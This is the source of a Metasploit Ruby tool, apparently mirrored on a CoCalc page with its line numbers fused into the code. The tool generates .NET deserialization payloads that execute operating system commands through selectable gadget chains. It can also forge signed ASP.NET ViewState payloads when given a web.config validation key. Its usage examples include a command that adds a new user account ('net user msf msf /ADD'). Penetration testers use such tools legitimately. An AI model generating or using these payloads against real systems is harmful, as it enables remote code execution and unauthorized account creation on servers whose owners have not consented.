CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/tools/payloads/ysoserial/dot_net.rb
Views: 1904
#!/usr/bin/env ruby12##3# This module requires Metasploit: https://metasploit.com/download4# Current source: https://github.com/rapid7/metasploit-framework5##67msfbase = __FILE__8while File.symlink?(msfbase)9msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase))10end11$:.unshift(File.expand_path(File.join(File.dirname(msfbase), '..', '..', '..', 'lib')))12require 'msfenv'13require 'rex'14require 'rex/exploit/view_state'15require 'optparse'1617DND = Msf::Util::DotNetDeserialization18BANNER = %Q{19Usage: #{__FILE__} [options]2021Generate a .NET deserialization payload that will execute an operating system22command using the specified gadget chain and formatter.2324Available formatters:25#{DND::Formatters::NAMES.map { |n| " * #{n}\n"}.join}26Available gadget chains:27#{DND::GadgetChains::NAMES.map { |n| " * #{n}\n"}.join}28Available HMAC algorithms: SHA1, HMACSHA256, HMACSHA384, HMACSHA512, MD52930Examples:31#{__FILE__} -c "net user msf msf /ADD" -f BinaryFormatter -g TypeConfuseDelegate -o base6432#{__FILE__} -c "calc.exe" -f LosFormatter -g TextFormattingRunProperties \\33--viewstate-validation-key deadbeef --viewstate-validation-algorithm SHA134}.strip3536def puts_transform_formats37$stdout.puts 'Available transform formats:'38$stdout.puts Msf::Simple::Buffer.transform_formats.map { |n| " * #{n}\n"}.join39end4041module YSoSerialDotNet42class OptsConsole43def self.parse(args)44options = {45formatter: DND::DEFAULT_FORMATTER,46gadget_chain: DND::DEFAULT_GADGET_CHAIN,47output_format: 'raw',48viewstate_generator: '',49viewstate_validation_algorithm: 'SHA1'50}51parser = OptionParser.new do |opt|52opt.banner = BANNER53opt.separator ''54opt.separator 'General options:'5556opt.on('-h', '--help', 'Show this message') do57$stdout.puts opt58exit59end6061opt.on('-c', '--command <String>', 'The command to run') do |v|62options[:command] = v63end6465opt.on('-f', '--formatter <String>', "The formatter to use (default: #{DND::DEFAULT_FORMATTER})") do |v|66v = v.to_sym67unless DND::Formatters::NAMES.include?(v)68raise OptionParser::InvalidArgument, "#{v} is not a valid formatter"69end7071options[:formatter] = v72end7374opt.on('-g', '--gadget <String>', "The gadget chain to use (default: #{DND::DEFAULT_GADGET_CHAIN})") do |v|75v = v.to_sym76unless DND::GadgetChains::NAMES.include?(v)77raise OptionParser::InvalidArgument, "#{v} is not a valid gadget chain"78end7980options[:gadget_chain] = v.to_sym81end8283opt.on('-o', '--output <String>', 'The output format to use (default: raw, see: --list-output-formats)') do |v|84normalized = o.downcase85unless Msf::Simple::Buffer.transform_formats.include?(normalized)86raise OptionParser::InvalidArgument, "#{v} is not a valid output format"87end8889options[:output_format] = v.downcase90end9192opt.on('--list-output-formats', 'List available output formats, for use with --output') do |v|93puts_transform_formats94exit95end9697opt.separator ''98opt.separator 'ViewState related options:'99100opt.on('--viewstate-generator <String>', 'The ViewState generator string to use') do |v|101unless v =~ /^[a-f0-9]{8}$/i102raise OptionParser::InvalidArgument, 'must be 8 hex characters, e.g. DEAD1337'103end104105options[:viewstate_generator] = [v.to_i(16)].pack('V')106end107108opt.on('--viewstate-validation-algorithm <String>', 'The validation algorithm (default: SHA1, see: Available HMAC algorithms)') do |v|109normalized = v.upcase.delete_prefix('HMAC')110unless %w[SHA1 SHA256 SHA384 SHA512 MD5].include?(normalized)111raise OptionParser::InvalidArgument, "#{v} is not a valid algorithm"112end113114# in some instances OpenSSL may not include all the algorithms that we might expect, so check for that115unless OpenSSL::Digest.constants.include?(normalized.to_sym)116raise RuntimeError, "OpenSSL does not support the #{normalized} digest"117end118119options[:viewstate_validation_algorithm] = normalized120end121122opt.on('--viewstate-validation-key <HexString>', 'The validationKey from the web.config file') do |v|123unless v =~ /^[a-f0-9]{2}+$/i124raise OptionParser::InvalidArgument, 'must be in hex'125end126127options[:viewstate_validation_key] = v.scan(/../).map { |x| x.hex.chr }.join128end129end130131parser.parse!(args)132133if options[:command].blank?134raise OptionParser::MissingArgument, '-c is required'135end136137options138end139end140141class Driver142def initialize143begin144@opts = OptsConsole.parse(ARGV)145rescue OptionParser::ParseError => e146$stderr.puts "[x] #{e.message}"147exit148end149end150151def run152$stderr.puts "Gadget chain: #{@opts[:gadget_chain]}"153$stderr.puts "Formatter: #{@opts[:formatter]}"154serialized = DND.generate(155@opts[:command],156gadget_chain: @opts[:gadget_chain],157formatter: @opts[:formatter]158)159160if @opts[:viewstate_validation_key]161serialized = Rex::Exploit::ViewState.generate_viewstate(162serialized,163extra: @opts[:viewstate_generator],164algo: @opts[:viewstate_validation_algorithm],165key: @opts[:viewstate_validation_key]166)167end168169transformed = ::Msf::Simple::Buffer.transform(serialized, @opts[:output_format])170$stderr.puts "Size: #{transformed.length}"171$stdout.puts transformed172end173end174end175176if __FILE__ == $PROGRAM_NAME177driver = YSoSerialDotNet::Driver.new178begin179driver.run180rescue ::Exception => e181elog(e)182$stderr.puts "[x] #{e.class}: #{e.message}"183$stderr.puts "[*] If necessary, please refer to framework.log for more details."184end185end186187188